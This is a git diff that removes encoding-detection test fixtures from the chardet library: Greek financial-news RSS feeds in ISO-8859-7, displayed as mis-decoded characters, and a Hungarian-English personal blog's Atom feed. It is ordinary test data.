b/chardet/tests/iso-8859-7-greek/naftemporiki.gr.cmm.xml deleted file mode 100644 index 17a14c1..0000000 --- a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.cmm.xml +++ /dev/null @@ -1,113 +0,0 @@ - - - - -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱ׀ֿ״ֵֹ׃ -http://www.naftemporiki.gr/ -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱ׀ֿ״ֵֹ׃ -el -Copyright 2006, ַ ֱֽױװֵּ׀ַֹֿׁ - ׀. ֱֱֱָֽ׃ֱִַֹ׃ & ׃ֱֹ ֱ.ֵ. -webmaster@naftemporiki.gr -Wed, 4 Jan 2006 07:11:00 +0200 -10 -http://www.naftemporiki.gr/news/rss.asp - - -ַ ֱֽױװֵּ׀ַֹֿׁ -120 -24 -http://www.naftemporiki.gr -http://www.naftemporiki.gr/_images/sources/naftlogo_120.gif - - - - -ַ נןכיפיך פחע ּבצבע פןץ ׀ן‎פים -http://www.naftemporiki.gr/news/rssredir.asp?id=1137181 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137181 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -«ַ ֵ.ֵ. בנקוי לםן םב... פחכוצ‏םחלב» -http://www.naftemporiki.gr/news/rssredir.asp?id=1137239 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137239 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ַ ֵ.ֵ. וץםןו פיע ומבדןסע ךבי ףץדקשםו‎ףויע -http://www.naftemporiki.gr/news/rssredir.asp?id=1136755 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136755 -Tue, 3 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -װן «ןסט» ֹףכל ךבפ פחע פסןלןךסבפבע -http://www.naftemporiki.gr/news/rssredir.asp?id=1136753 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136753 -Tue, 3 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -בכ‎פוסח קסןםי פן 2006 דיב פחם ֵץס‏נח -http://www.naftemporiki.gr/news/rssredir.asp?id=1136306 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136306 -Sat, 31 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֵםב ףפןקחלב נןכ‎נכןךן -http://www.naftemporiki.gr/news/rssredir.asp?id=1136082 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136082 -Fri, 30 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֵץס‏נח ךבי לןץףןץכלםןי: ֵםבע וךסחךפיךע ףץםהץבףלע -http://www.naftemporiki.gr/news/rssredir.asp?id=1136107 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136107 -Fri, 30 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -«װס‎נוע» ףפן צןסןכןדיך ף‎ףפחלב -http://www.naftemporiki.gr/news/rssredir.asp?id=1135723 -http://www.naftemporiki.gr/news/rssredir.asp?id=1135723 -Thu, 29 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ִ‎ףךןכח ח החלןףיןםןליך נסןףבסלןד -http://www.naftemporiki.gr/news/rssredir.asp?id=1135611 -http://www.naftemporiki.gr/news/rssredir.asp?id=1135611 -Thu, 29 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - - - - - - diff --git a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.fin.xml b/chardet/tests/iso-8859-7-greek/naftemporiki.gr.fin.xml deleted file mode 100644 index ad3b587..0000000 --- a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.fin.xml +++ /dev/null @@ -1,122 +0,0 @@ - - - - -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱֹֹּֽֿֿֿ -http://www.naftemporiki.gr/ -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱֹֹּֽֿֿֿ -el -Copyright 2006, ַ ֱֽױװֵּ׀ַֹֿׁ - ׀. ֱֱֱָֽ׃ֱִַֹ׃ & ׃ֱֹ ֱ.ֵ. -webmaster@naftemporiki.gr -Wed, 4 Jan 2006 07:17:00 +0200 -10 -http://www.naftemporiki.gr/news/rss.asp - - -ַ ֱֽױװֵּ׀ַֹֿׁ -120 -24 -http://www.naftemporiki.gr -http://www.naftemporiki.gr/_images/sources/naftlogo_120.gif - - - - -ֱםבךבפבפמויע ףפיע לופבצןסע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137223 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137223 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -־וםןהןקוב: ׀ןיוע נוסיןקע טושסן‎םפבי ךןסוףלםוע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137233 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137233 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׀ין נןככן «בךכץנפןי» ףו ֲ. ֵככהב -http://www.naftemporiki.gr/news/rssredir.asp?id=1137237 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137237 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׃קהיב דיב נכסח יהישפיךןנןחףח פחע Emporiki Bank -http://www.naftemporiki.gr/news/rssredir.asp?id=1137124 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137124 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -Aסקיףו ףפב ֵֻ.׀ֵ. ח חכוךפסןנבסבדשד -http://www.naftemporiki.gr/news/rssredir.asp?id=1137230 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137230 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֽב ףץםםפחףח ֳ׃ֵֵ לו וסדןהפוע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137225 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137225 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -Aםןהןע 1,3% ףפח ׃ןצןךכןץע, נםש בנ פיע 3.700 לןםהוע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137240 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137240 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֳ. ֱכןדןףךן‎צחע: ַ ןיךןםןלב םןיךןךץסו‎ופבי -http://www.naftemporiki.gr/news/rssredir.asp?id=1137072 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137072 -Tue, 3 Jan 2006 19:04:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ ON LINE) - - - -ּנבףיךןע: ִוךפע כוע ןי וםףפףויע דיב וניהןפףויע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137055 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137055 -Tue, 3 Jan 2006 17:40:00 +0200 - -editor@ana.gr (ֱ׀ֵ) - - - -ֱ‎מחףח 14,6% ףפב החלףיב ףןהב פן ִוךלגסין ךבי 6,3% ףפן 2005 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137054 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137054 -Tue, 3 Jan 2006 17:35:00 +0200 - -editor@ana.gr (ֱ׀ֵ) - - - - - - - - diff --git a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.mrk.xml b/chardet/tests/iso-8859-7-greek/naftemporiki.gr.mrk.xml deleted file mode 100644 index f0548dd..0000000 --- a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.mrk.xml +++ /dev/null @@ -1,124 +0,0 @@ - - - - -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱֳֵֿׁ׃ -http://www.naftemporiki.gr/ -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱֳֵֿׁ׃ -el -Copyright 2006, ַ ֱֽױװֵּ׀ַֹֿׁ - ׀. ֱֱֱָֽ׃ֱִַֹ׃ & ׃ֱֹ ֱ.ֵ. -webmaster@naftemporiki.gr -Wed, 4 Jan 2006 07:11:00 +0200 -10 -http://www.naftemporiki.gr/news/rss.asp - - -ַ ֱֽױװֵּ׀ַֹֿׁ -120 -24 -http://www.naftemporiki.gr -http://www.naftemporiki.gr/_images/sources/naftlogo_120.gif - - - - -ֹףןפילוע םןליףלפשם - ֵץס‏ - -http://www.naftemporiki.gr/news/rssredir.asp?id=1137277 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137277 -Wed, 4 Jan 2006 07:06:00 +0200 - -editor@ana.gr (ֱ׀ֵ) - - - -N - ִיוטםוע - ֹףןפילוע םןליףלפשם - ִןכבסןץ. - -http://www.naftemporiki.gr/news/rssredir.asp?id=1137276 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137276 -Wed, 4 Jan 2006 07:06:00 +0200 - -editor@ana.gr (ֱ׀ֵ) - - - -׳סחלבפיףפסין װךץן-Nikkei -http://www.naftemporiki.gr/news/rssredir.asp?id=1137275 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137275 -Wed, 4 Jan 2006 07:05:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ ON LINE) - - - -ֱףיבפיך ׳סחלבפיףפסיב -http://www.naftemporiki.gr/news/rssredir.asp?id=1137273 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137273 -Wed, 4 Jan 2006 07:01:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ ON LINE) - - - -ִץםבליך בסק ףפן 2006 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137210 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137210 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׃ןצם... פן בףבצע: ׳שסע בםפיףפףויע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137109 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137109 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -בטץףפוסחלםח םבסמח דיב פב נבסדשדב -http://www.naftemporiki.gr/news/rssredir.asp?id=1137185 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137185 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֵלנןסו‎לבפב -http://www.naftemporiki.gr/news/rssredir.asp?id=1137214 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137214 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -װב נסבךפיך פחע Fed «סימבם» פן הןכסין -http://www.naftemporiki.gr/news/rssredir.asp?id=1137215 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137215 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׀ופסכבין -http://www.naftemporiki.gr/news/rssredir.asp?id=1137213 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137213 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - - - - - - diff --git a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.mrt.xml b/chardet/tests/iso-8859-7-greek/naftemporiki.gr.mrt.xml deleted file mode 100644 index 1a902bf..0000000 --- a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.mrt.xml +++ /dev/null @@ -1,122 +0,0 @@ - - - - -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱֽױװֱֹֹֻ -http://www.naftemporiki.gr/ -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱֽױװֱֹֹֻ -el -Copyright 2006, ַ ֱֽױװֵּ׀ַֹֿׁ - ׀. ֱֱֱָֽ׃ֱִַֹ׃ & ׃ֱֹ ֱ.ֵ. -webmaster@naftemporiki.gr -Wed, 4 Jan 2006 07:11:00 +0200 -10 -http://www.naftemporiki.gr/news/rss.asp - - -ַ ֱֽױװֵּ׀ַֹֿׁ -120 -24 -http://www.naftemporiki.gr -http://www.naftemporiki.gr/_images/sources/naftlogo_120.gif - - - - -ֵֻֽ: ֱםבהיסטסשףח הףושם הבםוןץ -http://www.naftemporiki.gr/news/rssredir.asp?id=1137158 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137158 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֱךפןנכןתךע ופביסווע: ָופיךע נסןףהןךוע צסםוי ח בנוכוץטסשףח -http://www.naftemporiki.gr/news/rssredir.asp?id=1137156 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137156 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֿי נס‏פוע בצמויע פןץ 2006 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136691 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136691 -Tue, 3 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֱךפןנכןְב: ֽב פילןכןדיבך נןכיפיך צסםוי ח בנוכוץטסשףח -http://www.naftemporiki.gr/news/rssredir.asp?id=1136689 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136689 -Tue, 3 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׃פן «צןץכ» ןי לחקבםע פחע Naftomar -http://www.naftemporiki.gr/news/rssredir.asp?id=1136297 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136297 -Sat, 31 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ײןץםפ‏םוי ח ךםפסב דיב פיע דןםוע דסבללע -http://www.naftemporiki.gr/news/rssredir.asp?id=1136268 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136268 -Sat, 31 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֿי םבץנחדןוניףךוץבףפע זחפן‎ם פח ףץלנבסףפבףח פשם וסדבזןלםשם -http://www.naftemporiki.gr/news/rssredir.asp?id=1136290 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136290 -Sat, 31 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ּוסיך סףח בנבדסוץףחע בננכןץ -http://www.naftemporiki.gr/news/rssredir.asp?id=1136435 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136435 -Sat, 31 Dec 2005 06:48:00 +0200 - -editor@ana.gr (ֱ׀ֵ) - - - -ֵֻֽ: ֱסקזוי ףלוסב ח היבנסבדלפוץףח פשם םשם לופןק‏ם -http://www.naftemporiki.gr/news/rssredir.asp?id=1135986 -http://www.naftemporiki.gr/news/rssredir.asp?id=1135986 -Fri, 30 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֽן ךסןץבזיוסנכןין דיב פחם Costa ףו םבץנחדיך נסדסבללב 2 היף. הןכבסשם -http://www.naftemporiki.gr/news/rssredir.asp?id=1135985 -http://www.naftemporiki.gr/news/rssredir.asp?id=1135985 -Fri, 30 Dec 2005 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - - - - - - diff --git a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.spo.xml b/chardet/tests/iso-8859-7-greek/naftemporiki.gr.spo.xml deleted file mode 100644 index b09b9b9..0000000 --- a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.spo.xml +++ /dev/null @@ -1,122 +0,0 @@ - - - - -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱַָֻװֱֹ -http://www.naftemporiki.gr/ -ַ ֱֽױװֵּ׀ַֹֿׁ : ֱַָֻװֱֹ -el -Copyright 2006, ַ ֱֽױװֵּ׀ַֹֿׁ - ׀. ֱֱֱָֽ׃ֱִַֹ׃ & ׃ֱֹ ֱ.ֵ. -webmaster@naftemporiki.gr -Wed, 4 Jan 2006 07:11:00 +0200 -10 -http://www.naftemporiki.gr/news/rss.asp - - -ַ ֱֽױװֵּ׀ַֹֿׁ -120 -24 -http://www.naftemporiki.gr -http://www.naftemporiki.gr/_images/sources/naftlogo_120.gif - - - - -׀כן: ֽפסלני ֵטםיךן‎ - ֿכץלניבךן‎ -http://www.naftemporiki.gr/news/rssredir.asp?id=1137197 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137197 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֵטםיך: ֱםבךןםשףו פב ןםלבפב ן ֿפן -http://www.naftemporiki.gr/news/rssredir.asp?id=1137191 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137191 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ֱםבםו‏ףויע ףץלגןכבשם ףפןם ֿכץלניבך -http://www.naftemporiki.gr/news/rssredir.asp?id=1137188 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137188 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -װי טב הן‎לו ףפחם װV -http://www.naftemporiki.gr/news/rssredir.asp?id=1137176 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137176 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -װןסםן: ױנןהןק סשב דיב פןם ֶףח ֲס‎זב -http://www.naftemporiki.gr/news/rssredir.asp?id=1137192 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137192 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׃פןץע ךןסץצבןץע ן ֲבףףסבע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137194 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137194 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׀בםבטחםבתךע: ׃פן פסבנזי לופבדסבציך - נויטבסקב -http://www.naftemporiki.gr/news/rssredir.asp?id=1137190 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137190 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ַ ֱֵ היוךהיךו פןם בנופםן -http://www.naftemporiki.gr/news/rssredir.asp?id=1137189 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137189 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ּופבדסבצע - ונוךפףויע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137193 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137193 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ױנדסברו ףפח ׁוכ ּבהספחע ן בףםן -http://www.naftemporiki.gr/news/rssredir.asp?id=1137211 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137211 -Tue, 3 Jan 2006 22:06:00 +0200 - -editor@ana.gr (ֱ׀ֵ) - - - - - - - - diff --git a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.wld.xml b/chardet/tests/iso-8859-7-greek/naftemporiki.gr.wld.xml deleted file mode 100644 index 6e1818b..0000000 --- a/chardet/tests/iso-8859-7-greek/naftemporiki.gr.wld.xml +++ /dev/null @@ -1,122 +0,0 @@ - - - - -ַ ֱֽױװֵּ׀ַֹֿׁ : ֿ׃ּֿ׃ -http://www.naftemporiki.gr/ -ַ ֱֽױװֵּ׀ַֹֿׁ : ֿ׃ּֿ׃ -el -Copyright 2006, ַ ֱֽױװֵּ׀ַֹֿׁ - ׀. ֱֱֱָֽ׃ֱִַֹ׃ & ׃ֱֹ ֱ.ֵ. -webmaster@naftemporiki.gr -Wed, 4 Jan 2006 07:11:00 +0200 -10 -http://www.naftemporiki.gr/news/rss.asp - - -ַ ֱֽױװֵּ׀ַֹֿׁ -120 -24 -http://www.naftemporiki.gr -http://www.naftemporiki.gr/_images/sources/naftlogo_120.gif - - - - -ּודכח ח ב‎מחףח ףפיע נשכףויע חליבדשד‏ם נבדךןףלשע -http://www.naftemporiki.gr/news/rssredir.asp?id=1137114 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137114 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -«ּקח» ThyssenKrupp ךבי Arcelor דיב פחם Dofasco -http://www.naftemporiki.gr/news/rssredir.asp?id=1137118 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137118 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ױרחכפוסב ן לופבנןיחפיךע ךכהןע ףו ֵץסשז‏םח - ֹבנשםב -http://www.naftemporiki.gr/news/rssredir.asp?id=1137126 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137126 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׀םש בנ פן בםבלוםלוםן ח לושףח בםוסדבע ףפח ֳוסלבםב -http://www.naftemporiki.gr/news/rssredir.asp?id=1137120 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137120 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -װ‎נןע & ֿץףב -http://www.naftemporiki.gr/news/rssredir.asp?id=1137116 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137116 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -ַ נין ביףיהןמח נוסיןק ח ֱצסיך דיב פן 2006 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137119 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137119 -Wed, 4 Jan 2006 07:00:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ) - - - -׃חלבםפיך ב‎מחףח ףפיע נשכףויע חליבדשד‏ם פן ֽןלגסין -http://www.naftemporiki.gr/news/rssredir.asp?id=1137143 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137143 -Tue, 3 Jan 2006 20:52:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ ON LINE) - - - -ַ׀ֱ: ׀פ‏ףח פןץ הוךפח ISM פן ִוךלגסין -http://www.naftemporiki.gr/news/rssredir.asp?id=1137045 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137045 -Tue, 3 Jan 2006 17:04:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ ON LINE) - - - -ַ ֵ.ֵ. קביספיףו פחם בנןךבפףפבףח פשם נבסבהףושם סשףיךן‎ צץףיךן‎ בוסןץ -http://www.naftemporiki.gr/news/rssredir.asp?id=1137001 -http://www.naftemporiki.gr/news/rssredir.asp?id=1137001 -Tue, 3 Jan 2006 15:16:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ ON LINE) - - - -ּןכהבגב: ֱםבגככופבי ח בנוכוץטסשףח פחע וםסדויבע -http://www.naftemporiki.gr/news/rssredir.asp?id=1136968 -http://www.naftemporiki.gr/news/rssredir.asp?id=1136968 -Tue, 3 Jan 2006 13:19:00 +0200 - -editors@naftemporiki.gr (ַ ֱֽױװֵּ׀ַֹֿׁ ON LINE) - - - - - - - - diff --git a/chardet/tests/utf-8/anitabee.blogspot.com.xml b/chardet/tests/utf-8/anitabee.blogspot.com.xml deleted file mode 100644 index 393b88c..0000000 --- a/chardet/tests/utf-8/anitabee.blogspot.com.xml +++ /dev/null @@ -1,415 +0,0 @@ - - - - - - -Who am I -Hey all! -Well most of you know me, and are close to my heart. Maybe I'll just write crazy things or somethin' what's goin on wit me! So just sit down and .....have fun....but if you don't enjoy it, tell it, and turn this thang off :) -Now as I say..... PT aka Pusszancs Tappancs! - -tag:blogger.com,1999:blog-8512831 -2006-01-03T13:34:36Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -Hiphopstah-AnitaBee - -2006-01-03T14:02:00+01:00 -2006-01-03T13:34:36Z -2006-01-03T13:34:36Z - -tag:blogger.com,1999:blog-8512831.post-113629527678996819 -X ammmmmms - -
    -
    Az ֳ¼nnepi ֳ¶rֳ¶mkֳ¶dֳ©s hajֳ©gnekֳ¡llֳ³s pֳ¡niksikoltֳ³s ֳ©jjel kֳ¶zepֳ©n felriadֳ³s rֳ©mֳ¡lmodozֳ³s hangulattֳ¡ vֳ¡ltozott. ֳgy jֳ¡r, akinek nagyon happyn telnek az ֳ¼nnepek csalֳ¡ddal, barֳ¡tokkal, ismerֵ‘sֳ¶kkel...s 5.ֳ©n zֳ¡rֳ³vizslֳ¡zik, 6.ֳ¡n pedig szakmai szigorlatozik. Azt hiszem be wok gzolva 1 csֳ¶ppet. De megtom csinֳ¡lni! Pedig ismֳ©t van tֳ¶rpֳ©nֳ©s bֵ‘ven...s ֳ­gֳ©rem 6.ֳ¡n az lesz az elsֵ‘ dolgom, hogy nekilֳ¡tok bepֳ³tolni....
    -
    -
    -
    -
    Ma N-girlie azt mondta, hogy csilingel a hangom ֳ©s yo vֳ©gre ֳ­gy hallani beszֳ©lni...ֳ÷gy ֳ©rzem ez yot jelent...nekem is yo ֳ©rzֳ©s "csilingelni"...csak lene mֳ¡r vֳ©ge a vizslaidֵ‘szaknak :/
    -
    -
    -
    -
    Mֳ©g mindig nem bֳ©kֳ¼ltem ki ezekkel a szֳ­nekkel....sokֳ¡ig van mֳ©g karֳ¡csony?! :) Vagy lebonthatom vֳ­zkeresztkor a blog designt?! A fa ֳ÷gyis tovֳ¡bb ֳ¡ll nֳ¡lunk..but I like that :)
    -
    -
    -
    *****
    -
    -
    -
    So what's the result of having an extremly happy Holiday with family, friends and all yout loved ones?! Nightmares because of the coming exams on the 5th and 6th...I'm tooooo scared! But I know I will make it! There are plenty of big news, good news news news....and I promise as soon as I survive the exam on the 6th I will tell ya all about them...
    -
    -
    -
    -
    Today N-girlie told me on phone that my voice is like little twinkle and it is so good to hear this again in my voice....well...I like to be "twinklin" I only wish exams were over...
    -
    -
    -
    -
    I'm still not satisfied with these new colors in my blog...When should X-Mas design be over?! Okay I can hold on for a lil more time :)
    -
    -
    -false -
    - - - -Hiphopstah-AnitaBee - -2005-12-29T11:33:00+01:00 -2005-12-29T10:38:35Z -2005-12-29T10:38:35Z - -tag:blogger.com,1999:blog-8512831.post-113585271558428163 -kitolֳ³s szemtelenkedֵ‘s - -
    -
    -This post is dedicated to Molni. -
    -
    -Most kizֳ¡rֳ³lag azֳ©rt, rok, mert Molni.... -
    -
    -
    -MolniGee says:
    megnֳ©zem minden nap eccer
    MolniGee says:
    ֳ©s ma ֳ©pp most
    -
    -
    -
    -S nehogy mֳ¡r nem maradjon le semmirֵ‘l :) Ha mֳ¡r az elֵ‘zֵ‘s postom ֳ©pp, hogy megֳ­rtam mֳ¡r le is csapott rֳ¡. ֳgy most 1 egֳ©sz napig vֳ¡rnia kell, hogy megtudja, amit ide ֳ­rok :)))) -
    -
    -Big ֳ¶lelֳ©ֳ©ֳ©ֳ©ֳ©ֳ©ֳ©ֳ©s Neked ֳ©s Milliֳ³ Pusszancs Tappancs...mert TE vagy a legkedvesebb Mֳ©hecskevadֳ¡szom! -
    -
    -
    -false -
    - - - -Hiphopstah-AnitaBee - -2005-12-28T23:29:00+01:00 -2005-12-29T10:19:02Z -2005-12-28T23:03:21Z - -tag:blogger.com,1999:blog-8512831.post-113581100143123418 -Lemaradtam - -
    -
    - -X-MAS TIME - -
    -
    - - -
    -
    -
    -
    -
